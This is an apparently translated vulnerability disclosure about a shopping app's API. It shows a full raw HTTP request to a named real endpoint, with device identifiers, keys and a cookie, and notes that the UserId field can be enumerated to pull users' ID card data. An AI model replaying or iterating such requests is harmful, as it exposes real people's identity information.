Online shopping security: Home of Maternal and Child mobile APP involving hundreds of thousands of user ID card information

Online shopping security: Home of Maternal and Child mobile APP involving hundreds of thousands of user ID card information

Review. Isn't it on the wall yet?

1. The Code is as follows:
 

POST http://app.api.muyingzhijia.com/v1/GetUserIdentity HTTP/1.1SystemType: 4SystemKey: 8ED7EC10-D105-49EA-9E7C-30275C51351FPhoneModel: m2 noteLanguage: zhClientIp: 192.168.1.100UserIdentity: 868017029187502Imei: 868017029187502NetworkStatus: 2Resolution: 1080*1920ClientVersion: 22ClientVersionName: 3.0.2AreaId: 0PushToKen: Anu8CiE2BGjlS7KDB0cgPCjruVnMrSpw3xs1Xrhfo2jyTimeStamp: 1454503709VerifyKey: 6C2F68C7932D262C4DED45187085CAFASource: 1126UserId: 002389UserCode: 117765UserLabels: [{"GroupId":1,"Values":[7,136,28,83,233,90,102,137,146]}]Token: Content-Length: 0Host: app.api.muyingzhijia.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 5.1; zh-cn; m2 note Build/LMY47D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Cookie: aliyungf_tc=AQAAAHJw/h5IqgcABMiy3ekLVlLlSMqsCookie2: $Version=1Accept-Encoding: gzip

2. UserId: 002389 can be traversed,